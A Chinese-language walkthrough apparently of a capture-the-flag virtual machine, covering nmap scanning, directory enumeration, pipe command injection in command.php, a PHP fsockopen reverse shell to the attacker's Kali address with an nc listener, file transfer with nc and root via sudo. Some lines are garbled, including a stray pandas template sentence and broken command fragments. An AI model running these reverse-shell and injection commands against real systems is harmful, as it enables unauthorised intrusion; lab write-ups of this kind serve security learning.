这几天有点事情,靶机方面就没在更新,后边会积极的更新。
文章目录
文章目录信息收集漏洞发现利用提权总结
信息收集
信息收集是必不可少的.
靶机下载地址首先进行靶机发现
nmap -sn 192.168.240.1。1/24进行主机发现不尽兴端口扫描(128是kali地址)
然后对主机进行端口扫描
nmap -sV -T4 -A -p- 192.168.240.137 其中sV 扫描版本信息和开放的服务 , -A扫描开放端口的具体服务
发现端口33447
访问之发现是个网站
用dirsearch 扫描目录
没有什么有价值的东西,查看源码
发现/Challenge 访问之,当然题目名是这个
eee 我没发现
发现apache版本信息,可以搜索有没有相关cve漏洞之类的
发现是一个登入框
尝试注入啥的都不行那末继续进行网站目录扫描,ovo 没扫到.
尝试用dirbuster 扫面
用dirsearch 7zscan等没有扫到
经目录扫描得到,
Magic_Box/command.php 也是如此不一一列举
http://192.168.240.137:33447/Challenge/Magic_Box/command.php
发现了一个好东西
用|进行命令注入 成功!
利用 sock反弹shell
&3 2>&3");
得到php -r '$sock=fsockopen("192.168.240.128",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
进行url加密
1nc -lvvp 1234进行监听
成功send 发包成功反弹
拿到shell
常规思路利用python 进行提权
python -c "import pty; pty.spawn('/bin/bash')"
发现需要密码,那就找密码
查看passwd 权限是否可以写入
这是一种思路,这里却不行
那末换思路
这俩具有root 权限
查找一下该账户的相关文件
示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。
查找每个用户的文件
find / -user 2>/dev/null 2`是标准错误的意思,/dev/null指空设备,表示将标准错误输入到空设备中`
发现hint.pcapng
用nc来传输文件内
首先使用nc -lvnp 3344> hint.pcapng来监听传输听口然后在shell中使用nc 192.168.240.128 1234
成功接收
追踪tcp流,发现可以地方 疑似密码
尝试登入1337hax0r
用户名saman
然后用sudo -i 提权到root
成功!!! 结束
总结这个学到很多的东西
php -c "
$sock=fsockopen("192.168.240.128",1234);exec("/bin/sh -i <&3 >&3 2>&3");
"
然后用python -c "import pty;pty.spawn(’/bin/bash’);"进行提权 结合用 find / -user 2>/dev/null 查找关于用户的文件
